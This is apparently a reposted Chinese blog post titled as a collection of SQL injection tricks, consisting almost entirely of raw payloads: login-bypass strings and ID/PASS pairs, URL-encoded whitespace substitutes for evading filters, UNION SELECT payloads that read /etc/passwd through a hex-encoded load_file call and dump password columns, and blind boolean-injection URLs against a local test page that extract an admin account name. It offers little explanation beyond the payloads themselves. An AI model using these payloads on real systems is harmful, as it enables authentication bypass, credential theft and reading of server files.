SQL Injection的猥琐技巧

最新推荐文章于 2024-08-09 21:25:57 发布

tonghua6

最新推荐文章于 2024-08-09 21:25:57 发布

阅读量495

点赞数

分类专栏： Web安全文章标签： Web安全 sql注入数据库

Web安全专栏收录该内容

13 篇文章 1 订阅

订阅专栏

转载自：http://lightless.me/archives/SQL-Injection-weisuo-Skill.html

' or 1=1#

'=0#

'>-1#

'<1#

1'<99#

'=0=1#

'<=>0#

'=0=1=1=1=1=1#

'=1<>1#

'<>1#

1'<>99999#

'!=2!=3!=4#

'|0#

'&0#

'^0#

'<<0#

'>>0#

'&''#

'%11&1#

'&1&1#

'|0&1#

'<<0|0#

'<<0>>0#

'*9#

乘法

'/9#

除法

'%9#

求余

'+0#

加法

'-0#

减法

'+2+5-7#

'+0+0-0#

'-0-0-0-0-0#

'*9*8*7*6*5#

'/2/3/4#

'%12%34%56%78#

'/**/+/**/0#

'-----0#

'+++0+++++0*0#

'<hex(1)#

'=left(0x30,1)#

'=right(0,1)#

'!=curdate()#

'-reverse(0)#

'=ltrim(0)#

'<abs(1)#

'*round(1,1)#

'&left(0,0)#

'*round(0,1)*round(0,1)#

'=upper (0)#

' <1 and 1#

'xor 1#

'div 1#

'is not null#

admin' order by'admin' group by''like 0#

'between 1 and 1#

'regexp 1#

ID : '='

PASS: '='

ID : '<>'1

PASS: '<>'1

ID : '>1='

PASS: '>1='

ID : 0'='0

PASS: 0'='0

ID : '<1 and 1>'

PASS: '<1 and 1>'

ID : '<>ifnull(1,2)='1

PASS: '<>ifnull(1,2)='1

ID : '=round(0,1)='1

PASS: '=round(0,1)='1

ID : '*0*'

PASS: '*0*'

ID : '+'

PASS: '+'

ID : '-'

PASS: '-'

ID :'+1-1-'

PASS:'+1-1-'

'+(0-0)#

'=0<>((reverse(1))-(reverse(1)))#

'<(8*7)*(6*5)*(4*3)#

'&(1+1)-2#

'>(0-100)#

可以尝试使用以下的值替代空格

%09

%0a

%0b

%0c

%0d

%a0

%23%0a

%23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a

'union select 1,load_file(0x2f6574632f706173737764),3 from users#

'union select 1,group_concat(password),3 from users#

admin' and (select count(*) from users)=3#

http://127.0.0.1/info.php?num=1 and 1=0

http://127.0.0.1/info.php?num=1 and 1=1

http://192.168.137.129/info.php?num=1=0

http://192.168.137.129/info.php?num=1=1

http://127.0.0.1/info.php?num=1<>0

http://127.0.0.1/info.php?num=1<>1

http://127.0.0.1/info.php?num=1<0

http://127.0.0.1/info.php?num=1<1

http://127.0.0.1/info.php?num=1*0*0*1

http://127.0.0.1/info.php?num=1*0*0*0

http://127.0.0.1/info.php?num=1%1%1%0

http://127.0.0.1/info.php?num=1%1%1%1

http://127.0.0.1/info.php?num=1 div 0

http://127.0.0.1/info.php?num=1 div 1

http://127.0.0.1/info.php?num=1 regexp 0

http://127.0.0.1/info.php?num=1 regexp 1

http://127.0.0.1/info.php?num=1^0

http://127.0.0.1/info.php?num=1^1

http://127.0.0.1/info.php?num=0^(locate(0x61,(select id from users where num=1),1)=1)

http://127.0.0.1/info.php?num=0^(select position(0x61 in (select id from users where num=1))=1)

http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e)

http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e)

http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e)

http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e)

http://127.0.0.1/info.php?num=0^(id=0x61646d696e)

http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5)

http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5)

tonghua6

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
SQL Injection的猥琐技巧

转载自：http://lightless.me/archives/SQL-Injection-weisuo-Skill.html' or1=1#'=0#'>-1#'1#1'99#'=0=1#'0#'=0=1=1=1=1=1#'=11#'1#1'99999#'!=2!=3!=4#'|0#'&0#'^0#'0#'>
复制链接

扫一扫